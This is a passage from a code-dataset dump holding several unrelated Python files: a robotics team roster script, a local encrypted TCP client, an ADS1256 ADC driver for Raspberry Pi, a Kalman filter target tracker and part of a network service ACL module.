Regional\",\n\t\t\t\"Excellence In Engineering Award Sponsered By Delphi\",\n\t\t\t\"Championship Subdivision Winner In Carver Divison\",\n\t\t\t\"Entrepreneurship Award Sponsored By Kleiner Perkins Caufield And Byers\"]\n\t},\n\t4322 : {\n\t\t\"team_name\" : \"Clockwork Oranges\",\n\t\t\"location\" : \"Orange, CA\",\n\t\t\"rookie_year\" : 2012,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"San Diego Regional Presented By Qualcomm\" : \"Del Mar, CA\",\n\t\t\t\"Las Vegas Regional\" : \"Las Vegas, NV\",\n\t\t\t\"Einstein Field\" : \"Houston, TX\",\n\t\t\t\"Battleship Blast Monday\" : \"San Pedro, CA\",\n\t\t\t\"Beach Blitz\" : \"Huntington Beach, CA\"\n\t\t},\n\t\t\"2019_season_awards\" : [\n\t\t\t\"FIRST Dean's List Finalist Award\",\n\t\t\t\"FIRST Dean's List Award\"]\n\t},\n\t5458 : {\n\t\t\"team_name\" : \"Digital Minds\",\n\t\t\"location\" : \"Woodland, CA\",\n\t\t\"rookie_year\" : 2015,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"Central Valley Regional\" : \"Fresno, CA\",\n\t\t\t\"Sacramento Regional\" : \"Davis, CA\"\n\t\t},\n\t\t\"2019_season_awards\" : \"None\"\n\t},\n\t1 : {\n\t\t\"team_name\" : \"The Juggernauts\",\n\t\t\"location\" : \"Pontiac, MI\",\n\t\t\"rookie_year\" : 1997,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"FIM District Center Line Event\" : \"Center Line, MI\",\n\t\t\t\"FIM District Troy Event\" : \"Troy, MI\"\n\t\t},\n\t\t\"2019_season_awards\":\"Imagery Award In Honor Of Jack Kamen\"\n\t},\n\t7229 : {\n\t\t\"team_name\" : \"Electronic Eagles\",\n\t\t\"location\" : \"Sacramento, CA\",\n\t\t\"rookie_year\" : 2018,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"Sacramento Regional\" : \"Davis, CA\"\n\t\t}, \n\t\t\"2019_season_awards\" : \"None\"\n\t}\n}\n\nwhile True:\n\tinitial_user_request = input(\"Choose from: 'add' 'view_or_modify' 'remove' 'search' 'list' \")\n\tif initial_user_request == \"add\":\n\t\tadd_team()\n\t\n\telif initial_user_request == \"view_or_modify\":\n\t\tteam_view = int(input(\"Which team would you like to view? \"))\n\t\tview_or_modify_team(team_view)\n\n\telif initial_user_request == \"remove\":\n\t\tdelete_team = int(input(\"Which team would you like to remove? \"))\n\t\tremove_team(delete_team)\n\n\telif initial_user_request == \"search\":\n\t\tsearch_teams = input(\"Which team would you like to see? (By name or number) \")\n\t\tsearch_team(search_teams)\n\n\telif initial_user_request == \"list\":\n\t\tlist_team()\n\n\telse:\n\t\tprint(\"That is not a search option.\")\n","sub_path":"ch_3_assign_lucca_braudagan.py","file_name":"ch_3_assign_lucca_braudagan.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"4699736","text":"import socket\r\nfrom cryptography.fernet import Fernet\r\nimport argparse\r\n\r\n# Argumentos\r\ndescription = \"\"\"Modo de uso:\r\n cliente.py -msj \"Mensaje a enviar\"\"\"\r\nparser = argparse.ArgumentParser(description='Port scanning',\r\n epilog=description,\r\n formatter_class=argparse.RawDescriptionHelpFormatter)\r\nparser.add_argument(\"-msj\", metavar='MSJ', dest=\"msj\",\r\n help=\"mensaje a enviar\", required=True)\r\nparams = parser.parse_args()\r\n\r\n# Objeto para cifrar\r\nclave = Fernet.generate_key()\r\ncipher_suite = Fernet(clave)\r\n\r\n# Clave\r\nfile = open('clave.key', 'wb')\r\nfile.write(clave)\r\nfile.close()\r\n\r\n# Convertir a Bytes\r\nmensaje = params.msj\r\nmensajeBytes = mensaje.encode()\r\n\r\n# Ciframos\r\nmsj_cifrado = cipher_suite.encrypt(mensajeBytes)\r\nprint(\"Mensaje enviado:\\n\", mensaje)\r\n\r\n# Datos de conexion\r\nIP = '127.0.0.1'\r\nPuerto = 1333\r\nBuffer = 2048\r\n\r\n# Conexion\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((IP, Puerto))\r\ns.send(msj_cifrado)\r\nrespuesta = s.recv(Buffer).decode()\r\ns.close()\r\n\r\nprint(\"Respuesta recibida:\", respuesta)\r\n","sub_path":"Python/E9/clienteTCP.py","file_name":"clienteTCP.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"169496903","text":"import config\nimport RPi.GPIO as GPIO\nfrom datetime import datetime\nimport numpy as np\n\n\nScanMode = 0\n\n\n# gain channel\nADS1256_GAIN_E = {'ADS1256_GAIN_1' : 0, # GAIN 1\n 'ADS1256_GAIN_2' : 1, # GAIN 2\n 'ADS1256_GAIN_4' : 2, # GAIN 4\n 'ADS1256_GAIN_8' : 3, # GAIN 8\n 'ADS1256_GAIN_16' : 4,# GAIN 16\n 'ADS1256_GAIN_32' : 5,# GAIN 32\n 'ADS1256_GAIN_64' : 6,# GAIN 64\n }\n\n# data rate\nADS1256_DRATE_E = {'ADS1256_30000SPS' : 0xF0, # reset the default values\n 'ADS1256_15000SPS' : 0xE0,\n 'ADS1256_7500SPS' : 0xD0,\n 'ADS1256_3750SPS' : 0xC0,\n 'ADS1256_2000SPS' : 0xB0,\n 'ADS1256_1000SPS' : 0xA1,\n 'ADS1256_500SPS' : 0x92,\n 'ADS1256_100SPS' : 0x82,\n 'ADS1256_60SPS' : 0x72,\n 'ADS1256_50SPS' : 0x63,\n 'ADS1256_30SPS' : 0x53,\n 'ADS1256_25SPS' : 0x43,\n 'ADS1256_15SPS' : 0x33,\n 'ADS1256_10SPS' : 0x20,\n 'ADS1256_5SPS' : 0x13,\n 'ADS1256_2d5SPS' : 0x03\n }\n\n# registration definition\nREG_E = {'REG_STATUS' : 0, # x1H\n 'REG_MUX' : 1, # 01H\n 'REG_ADCON' : 2, # 20H\n 'REG_DRATE' : 3, # F0H\n 'REG_IO' : 4, # E0H\n 'REG_OFC0' : 5, # xxH\n 'REG_OFC1' : 6, # xxH\n 'REG_OFC2' : 7, # xxH\n 'REG_FSC0' : 8, # xxH\n 'REG_FSC1' : 9, # xxH\n 'REG_FSC2' : 10, # xxH\n }\n\n# command definition\nCMD = {'CMD_WAKEUP' : 0x00, # Completes SYNC and Exits Standby Mode 0000 0000 (00h)\n 'CMD_RDATA' : 0x01, # Read Data 0000 0001 (01h)\n 'CMD_RDATAC' : 0x03, # Read Data Continuously 0000 0011 (03h)\n 'CMD_SDATAC' : 0x0F, # Stop Read Data Continuously 0000 1111 (0Fh)\n 'CMD_RREG' : 0x10, # Read from REG rrr 0001 rrrr (1xh)\n 'CMD_WREG' : 0x50, # Write to REG rrr 0101 rrrr (5xh)\n 'CMD_SELFCAL' : 0xF0, # Offset and Gain Self-Calibration 1111 0000 (F0h)\n 'CMD_SELFOCAL' : 0xF1, # Offset Self-Calibration 1111 0001 (F1h)\n 'CMD_SELFGCAL' : 0xF2, # Gain Self-Calibration 1111 0010 (F2h)\n 'CMD_SYSOCAL' : 0xF3, # System Offset Calibration 1111 0011 (F3h)\n 'CMD_SYSGCAL' : 0xF4, # System Gain Calibration 1111 0100 (F4h)\n 'CMD_SYNC' : 0xFC, # Synchronize the A/D Conversion 1111 1100 (FCh)\n 'CMD_STANDBY' : 0xFD, # Begin Standby Mode 1111 1101 (FDh)\n 'CMD_RESET' : 0xFE, # Reset to Power-Up Values 1111 1110 (FEh)\n }\n\nclass ADS1256:\n def __init__(self):\n self.rst_pin = config.RST_PIN\n self.cs_pin = config.CS_PIN\n self.drdy_pin = config.DRDY_PIN\n\n # Hardware reset\n def ADS1256_reset(self):\n config.digital_write(self.rst_pin, GPIO.HIGH)\n config.delay_ms(200)\n config.digital_write(self.rst_pin, GPIO.LOW)\n config.delay_ms(200)\n config.digital_write(self.rst_pin, GPIO.HIGH)\n \n def ADS1256_WriteCmd(self, reg):\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([reg])\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n \n def ADS1256_WriteReg(self, reg, data):\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_WREG'] | reg, 0x00, data])\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n \n def ADS1256_Read_data(self, reg):\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_RREG'] | reg, 0x00])\n data = config.spi_readbytes(1)\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n \n return data\n \n def ADS1256_WaitDRDY(self):\n \n for i in range(0,400000,1):\n if(config.digital_read(self.drdy_pin) == 0):\n \n break\n if(i >= 400000):\n print (\"Time Out ...\\r\\n\")\n \n \n def ADS1256_ReadChipID(self):\n self.ADS1256_WaitDRDY()\n id = self.ADS1256_Read_data(REG_E['REG_STATUS'])\n id = id[0] >> 4\n # print 'ID',id\n return id\n \n #The configuration parameters of ADC, gain and data rate\n def ADS1256_ConfigADC(self, gain, drate):\n self.ADS1256_WaitDRDY()\n buf = [0,0,0,0]\n buf[0] = (0<<3) | (1<<2) | (0<<1)\n buf[1] = 0x08\n buf[2] = (0<<5) | (0<<3) | (gain<<0)\n buf[3] = drate\n \n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_WREG'] | 0, 0x03])\n config.spi_writebyte(buf)\n \n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n config.delay_ms(1) \n\n\n\n def ADS1256_SetChannal(self, Channal):\n if Channal > 7:\n return 0\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (Channal<<4) | (1<<3))\n\n def ADS1256_SetDiffChannal(self, Channal):\n if Channal == 0:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (0 << 4) | 1) #DiffChannal AIN0-AIN1\n elif Channal == 1:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (2 << 4) | 3) #DiffChannal AIN2-AIN3\n elif Channal == 2:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (4 << 4) | 5) #DiffChannal AIN4-AIN5\n elif Channal == 3:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (6 << 4) | 7) #DiffChannal AIN6-AIN7\n\n def ADS1256_SetMode(self, Mode):\n ScanMode = Mode\n\n def ADS1256_init(self):\n if (config.module_init() != 0):\n return -1\n self.ADS1256_reset()\n id = self.ADS1256_ReadChipID()\n if id == 3 :\n print(\"ID Read success \")\n else:\n print(\"ID Read failed \")\n return -1\n self.ADS1256_ConfigADC(ADS1256_GAIN_E['ADS1256_GAIN_1'], ADS1256_DRATE_E['ADS1256_7500SPS'])\n return 0\n \n def ADS1256_Read_ADC_Data(self):\n self.ADS1256_WaitDRDY()\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_RDATA']])\n buf = config.spi_readbytes(3)\n \n read = 0\n read = (buf[0]<<16) & 0xff0000\n read |= (buf[1]<<8) & 0xff00\n read |= (buf[2]) & 0xff\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n if (read & 0x800000):\n read |= 0xFF000000\n \n return read\n \n def ADS1256_GetChannalValue(self, Channel):\n if(ScanMode == 0):# 0 Single-ended input 8 channel1 Differential input 4 channe \n if(Channel>=8):\n return 0\n self.ADS1256_SetChannal(Channel)\n #self.ADS1256_WriteCmd(CMD['CMD_SYNC'])\n # config.delay_ms(10)\n #self.ADS1256_WriteCmd(CMD['CMD_WAKEUP'])\n # config.delay_ms(200)\n Value = self.ADS1256_Read_ADC_Data()\n else:\n if(Channel>=4):\n return 0\n self.ADS1256_SetDiffChannal(Channel)\n self.ADS1256_WriteCmd(CMD['CMD_SYNC'])\n # config.delay_ms(10) \n self.ADS1256_WriteCmd(CMD['CMD_WAKEUP'])\n # config.delay_ms(10) \n Value = self.ADS1256_Read_ADC_Data()\n return Value\n \n def ADS1256_GetAll(self):\n ADC_Value = [0,0,0,0,0,0,0,0]\n for i in range(0,8,1):\n ADC_Value[i] = self.ADS1256_GetChannalValue(i)\n return ADC_Value\n \n def ADS1256_GetSingleChannel(self, channel):\n self.ADS1256_SetChannal(channel)\n #self.ADS1256_WriteCmd(CMD['CMD_SYNC'])\n #config.delay_ms(10)\n #self.ADS1256_WriteCmd(CMD['CMD_WAKEUP'])\n #config.delay_ms(100)\n #print(np.mean(self.timer))\n Value = self.ADS1256_Read_ADC_Data()\n return Value\n### END OF FILE ###\n\n","sub_path":"raspberry/ADS1256.py","file_name":"ADS1256.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"171229112","text":"import numpy as np\nimport math\n\nclass AugmentKalmanFilter():\n \"\"\"Augment KF for target tracking.\n \"\"\"\n \n def __init__(self, time_interval, gate_1, gate_2, max_tracking_times, sigmaax, sigmaay, sigmaox, sigmaoy):\n \"\"\"The basic configuration parameters are as follow:\n time_interval - Time interval\n sigmaax - Sigma of acceleration noise in the x direction\n sigmaay - Sigma of acceleration noise in the y direction\n noise_q - Acceleration noise matrix\n sigmaox - Sigma of observation noise in the x direction\n sigmaoy - Sigma of observation noise in the y direction\n noise_r - Observation noise matrix\n xtrue - Location of ego vehicle\n gate_associate - Association distance\n \"\"\"\n \n self.time_interval = time_interval\n \n self.noise_q = np.matrix([[sigmaax ** 2, 0],\n [0, sigmaay ** 2],])\n self.noise_r = np.matrix([[sigmaox ** 2, 0],\n [0, sigmaoy ** 2],])\n \n self.xtrue = [0, 0]\n self.gate_associate_person = gate_1\n self.gate_associate_vehicle = gate_2\n self.max_tracking_times = max_tracking_times\n \n def kf_initialize(self, color_map):\n \"\"\"Initialize akf.\n \"\"\"\n \n # Initialize state xx and covariance px.\n self.xx = np.matrix([])\n self.px = np.matrix([])\n self.xx_cube = np.matrix([])\n self.xx_class = []\n \n # pre_aug stores the location of targets temporarily.\n self.pre_aug = np.matrix([])\n self.pre_aug_cube = np.matrix([])\n self.pre_aug_class = []\n \n # xx_mistracking stores wrong tracking information, and it gets higher when wrong tracking happens.\n self.xx_mistracking = []\n self.xx_color_idx = []\n self.color_map = color_map\n \n def kf_predict(self):\n \"\"\"KF predict.\n \"\"\"\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n ti = self.time_interval\n q = self.noise_q\n \n if xx.shape[1] == 0:\n return\n else:\n f = np.matrix([[1, ti, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, ti],\n [0, 0, 0, 1],])\n g = np.matrix([[0.5 * ti ** 2, 0],\n [ti, 0],\n [0, 0.5 * ti ** 2],\n [0, ti],])\n ff = f\n gg = g\n qq = q\n while ff.shape[0] < xx.shape[0]:\n ler = ff.shape[0]\n lec = ff.shape[1]\n ff = np.row_stack((ff, np.zeros((4, lec))))\n ff = np.column_stack((ff, np.zeros((ler + 4, 4))))\n ii = range(-4, 0)\n jj = range(-4, 0)\n for f_i in range(0, 4):\n for f_j in range(0, 4):\n ff[ii[f_i], jj[f_j]] = f[f_i, f_j]\n gg = np.row_stack((gg, np.zeros((4, int(lec / 2)))))\n gg = np.column_stack((gg, np.zeros((ler + 4, 2))))\n ii = range(-4, 0)\n jj = range(-2, 0)\n for g_i in range(0, 4):\n for g_j in range(0, 2):\n gg[ii[g_i], jj[g_j]] = g[g_i, g_j]\n qq = np.row_stack((qq, np.zeros((2, int(lec / 2)))))\n qq = np.column_stack((qq, np.zeros((int(ler / 2 + 2), 2))))\n ii = range(-2, 0)\n jj = range(-2, 0)\n for q_i in range(0, 2):\n for q_j in range(0, 2):\n qq[ii[q_i], jj[q_j]] = q[q_i, q_j]\n xx = ff * xx\n px = ff * px * ff.T + gg * qq * gg.T\n \n for j in range(0, int(xx_cube.shape[0] / 8)):\n xx_cube[range(8 * j, 8 * j + 8), 0] += xx[4 * j + 1, 0] * ti\n xx_cube[range(8 * j, 8 * j + 8), 2] += xx[4 * j + 3, 0] * ti\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n return\n \n def increase_mistracking(self):\n \"\"\"Increase xx_mistracking.\n \"\"\"\n \n xx_mistracking = self.xx_mistracking\n \n if xx_mistracking == []:\n pass\n else:\n for i in range(len(xx_mistracking)):\n xx_mistracking[i] += 1\n \n self.xx_mistracking = xx_mistracking\n return\n \n def associate(self, z, z_cube, z_class):\n \"\"\"Associate.\n Initialize za, id_za and zu.\n za represents targets which have been observed and associated.\n id_za stores indexes of targets in xx.\n zu represents targets which have been observed but not associated.\n \"\"\"\n \n self.za = np.matrix([])\n self.za_cube = np.matrix([])\n self.za_class = []\n self.id_za = []\n \n self.zu = np.matrix([])\n self.zu_cube = np.matrix([])\n self.zu_class = []\n \n za = self.za\n za_cube = self.za_cube\n za_class = self.za_class\n id_za = self.id_za\n \n zu = self.zu\n zu_cube = self.zu_cube\n zu_class = self.zu_class\n \n xx = self.xx\n xx_mistracking = self.xx_mistracking\n gate_associate_person = self.gate_associate_person\n gate_associate_vehicle = self.gate_associate_vehicle\n \n if z.shape[1] == 0:\n return\n else:\n for j in range(0, z.shape[1]):\n if z_class[j] == 'person':\n gate_associate = gate_associate_person\n elif z_class[j] == 'car':\n gate_associate = gate_associate_vehicle\n distance_m = float(\"inf\")\n id_associate_best = float(\"inf\")\n for k in range(0, int(xx.shape[0] / 4)):\n xx_x = xx[4 * k, 0]\n xx_y = xx[4 * k + 2, 0]\n z_x = z[0, j]\n z_y = z[1, j]\n dd = (z_x - xx_x) ** 2 + (z_y - xx_y) ** 2\n distance = math.sqrt(dd)\n if distance < gate_associate and distance < distance_m:\n distance_m = distance\n id_associate_best = k\n # Association accomplished.\n if id_associate_best != float(\"inf\"):\n za_new = z[:, [j]]\n za_cube_new = z_cube[:, range(3 * j, 3 * j + 3)]\n za_class_new = z_class[j]\n id_za_new = id_associate_best\n if za.shape[1] == 0:\n za = za_new\n za_cube = za_cube_new\n za_class = [za_class_new]\n id_za = [id_za_new]\n else:\n za = np.column_stack((za, za_new))\n za_cube = np.column_stack((za_cube, za_cube_new))\n za_class.append(za_class_new)\n id_za.append(id_za_new)\n xx_mistracking[id_associate_best] = 0\n # Association failed.\n else:\n zu_new = z[:, [j]]\n zu_cube_new = z_cube[:, range(3 * j, 3 * j + 3)]\n zu_class_new = z_class[j]\n if zu.shape[1] == 0:\n zu = zu_new\n zu_cube = zu_cube_new\n zu_class = [zu_class_new]\n else:\n zu = np.column_stack((zu, zu_new))\n zu_cube = np.column_stack((zu_cube, zu_cube_new))\n zu_class.append(zu_class_new)\n \n self.za = za\n self.za_cube = za_cube\n self.za_class = za_class\n self.id_za = id_za\n \n self.zu = zu\n self.zu_cube = zu_cube\n self.zu_class = zu_class\n \n self.xx_mistracking = xx_mistracking\n return\n \n def kf_update(self):\n \"\"\"KF update.\n \"\"\"\n \n za = self.za\n za_cube = self.za_cube\n za_class = self.za_class\n id_za = self.id_za\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n r = self.noise_r\n \n if za.shape[1] == 0:\n return\n else:\n h = np.matrix([[1, 0, 0, 0],\n [0, 0, 1, 0],])\n len_xx = xx.shape[0]\n len_za = za.shape[1]\n hh = np.zeros((2 * len_za, len_xx))\n zz = np.zeros((2 * len_za, 1))\n rr = np.zeros((2 * len_za, 2 * len_za))\n for j in range(0, len_za):\n ii = [2 * j, 2 * j + 1]\n jj = range(4 * id_za[j], 4 * id_za[j] + 4)\n for h_i in range(0, 2):\n for h_j in range(0, 4):\n hh[ii[h_i], jj[h_j]] = h[h_i, h_j]\n zz[ii, :] = za[:, [j]] - hh[ii, :] * xx\n for r_i in range(0, 2):\n for r_j in range(0, 2):\n rr[ii[r_i], ii[r_j]] = r[r_i, r_j]\n kk = px * hh.T * np.linalg.inv(hh * px * hh.T + rr)\n xx = xx + kk * zz\n px = px - kk * hh * px\n \n for j in range(0, len_za):\n xx_cube[range(8 * id_za[j], 8 * id_za[j] + 8), :] = za_cube[:, range(3 * j, 3 * j + 3)]\n xx_class[id_za[j]] = za_class[j]\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n return\n \n def delete(self):\n \"\"\"Delete targets which are beyond the range of observation.\n \"\"\"\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n xx_mistracking = self.xx_mistracking\n xx_color_idx = self.xx_color_idx\n xtrue = self.xtrue\n max_tracking_times = self.max_tracking_times\n \n if xx.shape[1] == 0:\n return\n else:\n # Judge whether some target should be deleted for its mistracking.\n k = 0\n while k < int(xx.shape[0] / 4):\n if xx_mistracking[k] > max_tracking_times:\n len_xx = xx.shape[0]\n if len_xx == 4:\n xx = np.matrix([])\n px = np.matrix([])\n xx_cube = np.matrix([])\n xx_class = []\n xx_mistracking = []\n xx_color_idx = []\n break\n else:\n xx = np.delete(xx, range(4 * k, 4 * k + 4), axis=0)\n px = np.delete(px, range(4 * k, 4 * k + 4), axis=0)\n px = np.delete(px, range(4 * k, 4 * k + 4), axis=1)\n xx_cube = np.delete(xx_cube, range(8 * k, 8 * k + 8), axis=0)\n xx_class.pop(k)\n xx_mistracking.pop(k)\n xx_color_idx.pop(k)\n continue\n k += 1\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n \n self.xx_mistracking = xx_mistracking\n self.xx_color_idx = xx_color_idx\n return\n \n def pre_augment(self):\n \"\"\"Prepare for KF augment.\n aug contains velocity information which is obtained using two frames of location of the same target.\n \"\"\"\n \n zu = self.zu\n zu_cube = self.zu_cube\n zu_class = self.zu_class\n \n pre_aug = self.pre_aug\n pre_aug_cube = self.pre_aug_cube\n pre_aug_class = self.pre_aug_class\n \n self.aug = np.matrix([])\n self.aug_cube = np.matrix([])\n self.aug_class = []\n \n time_interval = self.time_interval\n gate_associate_person = self.gate_associate_person\n gate_associate_vehicle = self.gate_associate_vehicle\n \n aug = self.aug\n aug_cube = self.aug_cube\n aug_class = self.aug_class\n \n if zu.shape[1] == 0:\n return\n else:\n if pre_aug.shape[1] == 0:\n pre_aug = zu\n pre_aug_cube = zu_cube\n pre_aug_class = zu_class\n \n self.pre_aug = pre_aug\n self.pre_aug_cube = pre_aug_cube\n self.pre_aug_class = pre_aug_class\n \n self.aug = aug\n self.aug_cube = aug_cube\n self.aug_class = aug_class\n return\n else:\n for j in range(0, zu.shape[1]):\n if zu_class[j] == 'person':\n gate_associate = gate_associate_person\n elif zu_class[j] == 'car':\n gate_associate = gate_associate_vehicle\n pre_distance_m = float(\"inf\")\n pre_id_associate_best = float(\"inf\")\n for k in range(0, pre_aug.shape[1]):\n dd = (zu[0, j] - pre_aug[0, k]) ** 2 + (zu[1, j] - pre_aug[1, k]) ** 2\n pre_distance = math.sqrt(dd)\n if pre_distance < gate_associate and pre_distance < pre_distance_m:\n pre_distance_m = pre_distance\n pre_id_associate_best = k\n if pre_id_associate_best != float(\"inf\"):\n aug_new = np.matrix([[zu[0, j]],\n [(zu[0, j] - pre_aug[0, pre_id_associate_best]) / time_interval],\n [zu[1, j]],\n [(zu[1, j] - pre_aug[1, pre_id_associate_best]) / time_interval],])\n aug_cube_new = zu_cube[:, range(3 * j, 3 * j + 3)]\n aug_class_new = zu_class[j]\n if aug.shape[1] == 0:\n aug = aug_new\n aug_cube = aug_cube_new\n aug_class = [aug_class_new]\n else:\n aug = np.column_stack((aug, aug_new))\n aug_cube = np.column_stack((aug_cube, aug_cube_new))\n aug_class.append(aug_class_new)\n \n pre_aug = zu\n pre_aug_cube = zu_cube\n pre_aug_class = zu_class\n \n self.pre_aug = pre_aug\n self.pre_aug_cube = pre_aug_cube\n self.pre_aug_class = pre_aug_class\n \n self.aug = aug\n self.aug_cube = aug_cube\n self.aug_class = aug_class\n return\n \n def kf_augment(self):\n \"\"\"KF augment.\n \"\"\"\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n xx_mistracking = self.xx_mistracking\n xx_color_idx = self.xx_color_idx\n color_map = self.color_map\n \n aug = self.aug\n aug_cube = self.aug_cube\n aug_class = self.aug_class\n \n r = self.noise_r\n \n if aug.shape[1] == 0:\n return\n else:\n len_aug = aug.shape[1]\n for j in range(0, len_aug):\n xx_new = aug[:, j]\n xx_cube_new = aug_cube[:, range(3 * j, 3 * j + 3)]\n xx_class_new = aug_class[j]\n s = np.matrix([[1, 0],\n [0, 0],\n [0, 1],\n [0, 0],])\n px_new = s * r * s.T\n mistracking_new = 0\n color_idx_new = np.random.randint(1, len(color_map))\n \n # Augment xx.\n if xx.shape[1] == 0:\n xx = xx_new\n xx_cube = xx_cube_new\n xx_class = [xx_class_new]\n else:\n xx = np.row_stack((xx, xx_new))\n xx_cube = np.row_stack((xx_cube, xx_cube_new))\n xx_class.append(xx_class_new)\n \n # Augment px.\n if px.shape[1] == 0:\n px = px_new\n else:\n len_px = px.shape[1]\n ii = range(-4, 0)\n px = np.row_stack((px, np.zeros((4, len_px))))\n px = np.column_stack((px, np.zeros((len_px + 4, 4))))\n for p_i in range(0, 4):\n for p_j in range(0, 4):\n px[ii[p_i], ii[p_j]] = px_new[p_i, p_j]\n \n xx_mistracking.append(mistracking_new)\n xx_color_idx.append(color_idx_new)\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n \n self.xx_mistracking = xx_mistracking\n self.xx_color_idx = xx_color_idx\n return\n\n def kf_iterate(self, z, z_cube, z_class):\n self.kf_predict()\n self.increase_mistracking()\n self.associate(z, z_cube, z_class)\n self.kf_update()\n self.delete()\n self.pre_augment()\n self.kf_augment()\n\n","sub_path":"scripts/akf_tracker.py","file_name":"akf_tracker.py","file_ext":"py","file_size_in_byte":17831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"175725762","text":"import linecache\nimport logging\n\nfrom flowsieve.acl.acl_result import ACLResult, PacketMatch\nfrom flowsieve.acl.base_acl import BaseACL\nfrom flowsieve.acl.service_set import ServiceSet\n\nfrom ryu.lib.packet import ethernet, ipv4, tcp, udp\nfrom ryu.lib.packet.ether_types import ETH_TYPE_IP\nfrom ryu.lib.packet.in_proto import IPPROTO_TCP, IPPROTO_UDP\n\n\nclass ServiceACL(BaseACL):\n def __init__(self, **kwargs):\n super(ServiceACL, self).__init__(**kwargs)\n self.allowed_services = [s for s in [\n Service.from_str(s) for s in kwargs.get(\"allowed_services\", [])]\n if s is not None]\n self.denied_services = [s for s in [\n Service.from_str(s) for s in kwargs.get(\"denied_services\", [])]\n if s is not None]\n self.default = kwargs.get(\"service_default\", \"allow\")\n self.service_set = ServiceSet.empty()\n\n def load_relations(self, user_store):\n self.build_service_set()\n\n def build_service_set(self):\n self.service_set = ServiceSet.whole()\n\n default_str_low = self.default.lower()\n if default_str_low == \"deny\":\n self.service_set = ServiceSet.empty()\n elif default_str_low == \"allow\":\n self.service_set = ServiceSet.whole()\n elif default_str_low == \"inherit\" and self.parent is not None:\n self.parent.build_service_set()\n self.service_set = self.parent.service_set\n else:\n self._logger.warning(\"Unknown service_default value %s\",\n self.default)\n\n self.service_set += ServiceSet(services=self.allowed_services)\n self.service_set -= ServiceSet(services=self.denied_services)\n\n def allows_packet(self, pkt, src_user):\n if pkt is None:\n return ACLResult(src_user in self.service_set, PacketMatch())\n\n eth = pkt.get_protocol(ethernet.ethernet)\n iph = pkt.get_protocol(ipv4.ipv4)\n tcph = pkt.get_protocol(tcp.tcp)\n udph = pkt.get_protocol(udp.udp)\n\n # This is not a TCP/IP packet\n if iph is None:\n return ACLResult(True, PacketMatch(dl_type=eth.ethertype))\n elif tcph is None and udph is None:\n return ACLResult(True, PacketMatch(dl_type=ETH_TYPE_IP,\n nw_proto=iph.proto))\n\n match = PacketMatch(dl_type=ETH_TYPE_IP)\n\n if tcph is not None:\n service = Service(TP_PROTO_TCP, tcph.dst_port)\n match += PacketMatch(nw_proto=IPPROTO_TCP, tp_dst=service.port)\n elif udph is not None:\n service = Service(TP_PROTO_UDP, udph.dst_port)\n match += PacketMatch(nw_proto=IPPROTO_UDP, tp_dst=service.port)\n\n return ACLResult(service in self.service_set, match)\n\n def __repr__(self):\n return \"\".format(\n self.allowed_services, self.denied_services\n )\n\n# Protocol alias\nTP_PROTO_TCP = 1\nTP_PROTO_UDP = 2\nPROTO_DDP = 3\nPROTO_SCTP = 4\n\n\nclass Service(object):\n ETC_SERVICE_FILE = \"/etc/services\"\n extracted_service = []\n extracted_port = []\n extracted_proto = []\n logger = logging.getLogger(__name__)\n service_file = []\n\n @classmethod\n def read_etc_service(cls):\n if cls.service_file != []:\n return\n try:\n cls.service_file = linecache.getlines(cls.ETC_SERVICE_FILE)\n cls.logger.debug(\"Service_file is ready\")\n cls.parse_file()\n except IOError:\n cls.logger.error(\"Could not open %s\" % cls.ETC_SERVICE_FILE)\n return None\n\n @classmethod\n def parse_file(cls):\n import re\n for line in cls.service_file:\n if line[0].isalpha():\n # ignore blank line and comment\n remove_comment = line.split(\"#\")[0]\n # discard inline comment\n splitted_line = re.split(\" |\\t|\\n\", remove_comment)\n # split the line by space/tab/change line\n for each in splitted_line:\n if each != \"\":\n if len(each.split(\"/\")) == 1:\n # there is no '/' 